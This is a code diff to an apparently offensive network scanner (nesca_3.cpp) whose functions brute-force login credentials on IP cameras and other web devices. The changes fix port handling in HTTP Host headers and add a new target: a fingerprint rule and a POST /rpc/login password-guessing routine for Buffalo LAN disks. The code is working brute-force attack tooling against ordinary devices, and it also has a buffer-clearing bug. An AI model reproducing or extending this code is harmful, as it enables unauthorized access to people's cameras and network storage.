diff --git a/connector.cpp b/connector.cpp
index 77fd149..05f4b60 100644
--- a/connector.cpp
+++ b/connector.cpp
@@ -381,6 +381,11 @@ lopaStr _BABrute(char *cookie, char *ip, int port, char *pathT, char *method)
strcat(hRqst, path);
strcat(hRqst, " HTTP/1.1\r\nHost: ");
strcat(hRqst, ip);
+ if(port != 80){
+ strcat(hRqst, ":");
+ char tbuff[16] = {0};
+ strcat(hRqst, itoa(port, tbuff, 10));
+ };
if(cookieLen != 0)
{
strcat(hRqst, "\r\nCookie: ");
@@ -577,6 +582,11 @@ lopaStr _BABrute(char *cookie, char *ip, int port, char *pathT, char *method)
strcat(request, path);
strcat(request, " HTTP/1.1\r\nHost: ");
strcat(request, ip);
+ if(port != 80){
+ strcat(request, ":");
+ char tbuff[16] = {0};
+ strcat(request, itoa(port, tbuff, 10));
+ };
if(cookieLen != 0)
{
strcat(request, "\r\nCookie: ");
@@ -614,6 +624,11 @@ lopaStr _BABrute(char *cookie, char *ip, int port, char *pathT, char *method)
strcat(request, path);
strcat(request, " HTTP/1.1\r\nHost: ");
strcat(request, ip);
+ if(port != 80){
+ strcat(request, ":");
+ char tbuff[16] = {0};
+ strcat(request, itoa(port, tbuff, 10));
+ };
if(cookieLen != 0)
{
strcat(request, "\r\nCookie: ");
@@ -1934,8 +1949,7 @@ lopaStr _WFBrut(char *cookie, char *ip, int port, char *methodVal, char *actionV
strcat(request, "\r\nCookie: ");
strcat(request, cookie);
};
- strcat(request, "\r\nContent-type: application/x-www-form-urlencoded\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: us-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nConnection: close\r\n");
- strcat(request, "Content-length: ");
+ strcat(request, "\r\nContent-type: application/x-www-form-urlencoded\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: us-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nConnection: close\r\nContent-Length: ");
strcat(request, itoa(strlen(argData), b, 10));
strcat(request, "\r\n\r\n");
@@ -2324,6 +2338,10 @@ lopaStr _IPCameraBrute(char *ip, int port, char *SPEC)
{
negVector.push_back("Password Error");
}
+ else if(strcmp(SPEC, "BUFFALO") == 0)
+ {
+ negVector.push_back("403 Forbidden");
+ }
else
{
stt->doEmitionRedFoundData("[_IPCameraBrute] No \"SPEC\" specified!");
@@ -2358,7 +2376,12 @@ lopaStr _IPCameraBrute(char *ip, int port, char *SPEC)
strcat(request, "&pwd=");
strcat(request, pass);
strcat(request, " HTTP/1.1\r\nHost: ");
- strcat(request, ip);
+ strcat(request, ip);
+ if(port != 80){
+ strcat(request, ":");
+ char tbuff[16] = {0};
+ strcat(request, itoa(port, tbuff, 10));
+ };
strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: close\r\n\r\n");
}
else if(strcmp(SPEC, "GEO") == 0)
@@ -2369,6 +2392,11 @@ lopaStr _IPCameraBrute(char *ip, int port, char *SPEC)
strcat(request, pass);
strcat(request, " HTTP/1.1\r\nHost: ");
strcat(request, ip);
+ if(port != 80){
+ strcat(request, ":");
+ char tbuff[16] = {0};
+ strcat(request, itoa(port, tbuff, 10));
+ };
strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: close\r\n\r\n");
}
else if(strcmp(SPEC, "EasyCam") == 0)
@@ -2383,6 +2411,11 @@ lopaStr _IPCameraBrute(char *ip, int port, char *SPEC)
strcat(request, pass);
strcat(request, " HTTP/1.1\r\nHost: ");
strcat(request, ip);
+ if(port != 80){
+ strcat(request, ":");
+ char tbuff[16] = {0};
+ strcat(request, itoa(port, tbuff, 10));
+ };
strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: close\r\n\r\n");
}
else if(strcmp(SPEC, "Foscam") == 0)
@@ -2397,6 +2430,11 @@ lopaStr _IPCameraBrute(char *ip, int port, char *SPEC)
strcat(request, pass);
strcat(request, " HTTP/1.1\r\nHost: ");
strcat(request, ip);
+ if(port != 80){
+ strcat(request, ":");
+ char tbuff[16] = {0};
+ strcat(request, itoa(port, tbuff, 10));
+ };
strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: close\r\n\r\n");
}
else if(strcmp(SPEC, "AVIOSYS") == 0)
@@ -2407,7 +2445,38 @@ lopaStr _IPCameraBrute(char *ip, int port, char *SPEC)
strcat(request, pass);
strcat(request, " HTTP/1.1\r\nHost: ");
strcat(request, ip);
+ if(port != 80){
+ strcat(request, ":");
+ char tbuff[16] = {0};
+ strcat(request, itoa(port, tbuff, 10));
+ };
strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: close\r\n\r\n");
+ }
+ else if(strcmp(SPEC, "BUFFALO") == 0)
+ {
+ strcpy(request, "POST /rpc/login HTTP/1.1\r\nHost: ");
+ strcat(request, ip);
+ if(port != 80){
+ strcat(request, ":");
+ char tbuff[16] = {0};
+ strcat(request, itoa(port, tbuff, 10));
+ };
+ strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: keep-alive");
+ int loginLength = strlen(login);
+ int passLength = strlen(pass);
+ int sz = loginLength + passLength + strlen("user=&password=");
+ char *passString = new char[sz + 1];
+ ZeroMemory(passString, sizeof(passString));
+ strcpy(passString, "user=");
+ strcat(passString, login);
+ strcat(passString, "&password=");
+ strcat(passString, pass);
+ strcat(request, "\r\nContent-Length: ");
+ char tempBuff[16] = {0};
+ strcat(request, itoa(sz, tempBuff, 10));
+ strcat(request, "\r\n\r\n");
+ strcat(request, passString);
+ delete []passString;
};
int res = _webLoginSeq(request, login, pass, ip, port, passCounter, SPEC, negVector);
@@ -2534,10 +2603,12 @@ int Connector::_ConnectToPort(char *ip, const char *portC, char *hl)
int strFlag = 0;
strcpy(mes, buff1);
strcat(mes, ip);
- strcat(mes, ":");
- strcat(mes, portC);
- strcat(mes, buff2);
int port = atoi(portC);
+ if(port != 80){
+ strcat(mes, ":");
+ strcat(mes, portC);
+ };
+ strcat(mes, buff2);
int cRes;
if(port == 443) cRes = _EstablishSSLConnection(ip, port, mes, &CSTR);
diff --git a/finder.cpp b/finder.cpp
index 1e722af..a2b358d 100644
--- a/finder.cpp
+++ b/finder.cpp
@@ -181,7 +181,7 @@ int Lexems::globalSearchNeg(const char *buffcpy, char *ip, int port)
{
if(gNegDebugMode)
{
- stt->doEmitionDebugFoundData("[" + QString(ip) + ":" + QString::number(port) + "" + "] Negative hit: \"" + QString::fromLocal8Bit(negWord).toHtmlEscaped() + "\"");
+ stt->doEmitionDebugFoundData("[" + QString(ip) + ":" + QString::number(port) + "" + "] Negative hit: \"" + QString::fromLocal8Bit(negWord).toHtmlEscaped() + "\"");
if(strlen(negWord) < 2)
{
stt->doEmitionDebugFoundData(" Len:" + QString::number(strlen(negWord)));
@@ -290,6 +290,7 @@ int _mainFinderFirst(char *buffcpy, int f, int port, char *ip)
&& strstr(buffcpy, "g_ologin.dologin()") != NULL
) return 44; //hikvision cam 2
if(strstr(buffcpy, "panasonic") != NULL && strstr(buffcpy, "/config/index.cgi") != NULL) return 45; //Panasonic Cam BB-HG???
+ if(strstr(buffcpy, "/ui/") != NULL && strstr(buffcpy, "sencha-touch") != NULL) return 46; //BUFFALO disk
if(strstr(buffcpy, "camera web server") != NULL || strstr(buffcpy, "webcamxp 5") != NULL
|| strstr(buffcpy, "ip box camera") != NULL || strstr(buffcpy, "snaff") != NULL
@@ -358,6 +359,8 @@ int _mainFinderSecond(char *buffcpy, int port, char *ip)
&& strstr(buffcpy, "g_ologin.dologin()") != NULL
) return 44; //hikvision cam 2
if(strstr(buffcpy, "panasonic") != NULL && strstr(buffcpy, "/config/index.cgi") != NULL) return 45; //Panasonic Cam BB-HG???
+ if(strstr(buffcpy, "/ui/") != NULL && strstr(buffcpy, "sencha-touch") != NULL) return 46; //BUFFALO disk
+
if(strstr(buffcpy, "hikvision-webs") != NULL || (strstr(buffcpy, "hikvision digital") != NULL && strstr(buffcpy, "dvrdvs-webs") != NULL)
|| (strstr(buffcpy, "lapassword") != NULL && strstr(buffcpy, "lausername") != NULL && strstr(buffcpy, "dologin()") != NULL)) return 34; //hikvision cam
@@ -1708,7 +1711,7 @@ int Lexems::_filler(int p, char* buffcpy, char* ip, int recd, Lexems *lx, char *
}
else if(flag == 38) //Foscam
{
- _specWEBIPCAMBrute(ip, p, hl, "[Foscam] IP Camera", flag, "[Foscam] IP Camera", "Basic Authorization", cp, recd, "Foscam");
+ _specWEBIPCAMBrute(ip, p, hl, "[Foscam] IP Camera", flag, "[Foscam] IP Camera", "Web Authorization", cp, recd, "Foscam");
}
else if(flag == 39) //EagleEye
{
@@ -1720,7 +1723,7 @@ int Lexems::_filler(int p, char* buffcpy, char* ip, int recd, Lexems *lx, char *
}
else if(flag == 41) //AVIOSYS-camera
{
- _specWEBIPCAMBrute(ip, p, hl, "[AVIOSYS] IP Camera", flag, "[AVIOSYS] IP Camera", "Basic Authorization", cp, recd, "AVIOSYS");
+ _specWEBIPCAMBrute(ip, p, hl, "[AVIOSYS] IP Camera", flag, "[AVIOSYS] IP Camera", "Web Authorization", cp, recd, "AVIOSYS");
}
else if(flag == 42) //NW_camera
{
@@ -1738,6 +1741,10 @@ int Lexems::_filler(int p, char* buffcpy, char* ip, int recd, Lexems *lx, char *
{
_specBrute(ps.cookie, ip, p, hl, "[Panasonic] IP Camera", flag, "/config/index.cgi", "[Panasonic] IP Camera", "Basic Authorization", cp, recd, "");
}
+ else if(flag == 46) //Buffalo disk
+ {
+ _specWEBIPCAMBrute(ip, p, hl, "[Buffalo] Lan Disk", flag, "[Buffalo] Lan Disk", "Web Authorization", cp, recd, "BUFFALO");
+ }
else if(flag == 20) //AXIS Camera
{
_specBrute(ps.cookie, ip, p, hl, "AXIS Camera", flag, "/axis-cgi/com/ptz.cgi?", "AXIS Camera", "Basic Authorization", cp, recd, "");
@@ -1901,6 +1908,11 @@ int redirectReconnect(char *cookie, char *ip, int port, char *str, Lexems *ls, P
strcat(mes, tempPath);
strcat(mes, rbuff2);
strcat(mes, tempIP);
+ if(tempPort != 80){
+ strcat(mes, ":");
+ char tbuff[16] = {0};
+ strcat(mes, itoa(tempPort, tbuff, 10));
+ }
if(strlen(cookie) != 0)
{
strcat(mes, rbuff3);
@@ -2028,9 +2040,11 @@ int redirectReconnect(char *cookie, char *ip, int port, char *str, Lexems *ls, P
strcat(mes, tempPath);
strcat(mes, rbuff2);
strcat(mes, tempIP);
- strcat(mes, ":");
- char tbuff[16] = {0};
- strcat(mes, itoa(tempPort, tbuff, 10));
+ if(tempPort != 80){
+ strcat(mes, ":");
+ char tbuff[16] = {0};
+ strcat(mes, itoa(tempPort, tbuff, 10));
+ }
if(strlen(cookie) != 0)
{
strcat(mes, rbuff3);
@@ -2129,6 +2143,11 @@ int redirectReconnect(char *cookie, char *ip, int port, char *str, Lexems *ls, P
strcat(mes, tempPath);
strcat(mes, rbuff2);
strcat(mes, ip);
+ if(tempPort != 80){
+ strcat(mes, ":");
+ char tbuff[16] = {0};
+ strcat(mes, itoa(tempPort, tbuff, 10));
+ }
if(strlen(cookie) != 0)
{
strcat(mes, rbuff3);
@@ -2217,6 +2236,11 @@ int redirectReconnect(char *cookie, char *ip, int port, char *str, Lexems *ls, P
strcat(mes, tempPath);
strcat(mes, rbuff2);
strcat(mes, ip);
+ if(tempPort != 80){
+ strcat(mes, ":");
+ char tbuff[16] = {0};
+ strcat(mes, itoa(tempPort, tbuff, 10));
+ }
if(strlen(cookie) != 0)
{
strcat(mes, rbuff3);
diff --git a/nesca_3.cpp b/nesca_3.cpp
index 22628bb..c531d61 100644
--- a/nesca_3.cpp
+++ b/nesca_3.cpp
@@ -2194,7 +2194,7 @@ void nesca_3::slotOutData(QString ip, QString str)
str.replace("Accept-Encoding:", "Accept-Encoding:");
str.replace("User-Agent:", "User-Agent:");
str.replace("Connection:", "Connection:");
- str.replace("Content-length:", "Content-length:");
+ str.replace("Content-Length:", "Content-Length:");
str.replace("Authorization:", "Authorization:");
_rOutProt.indexIn(str);
prot = _rOutProt.cap(0);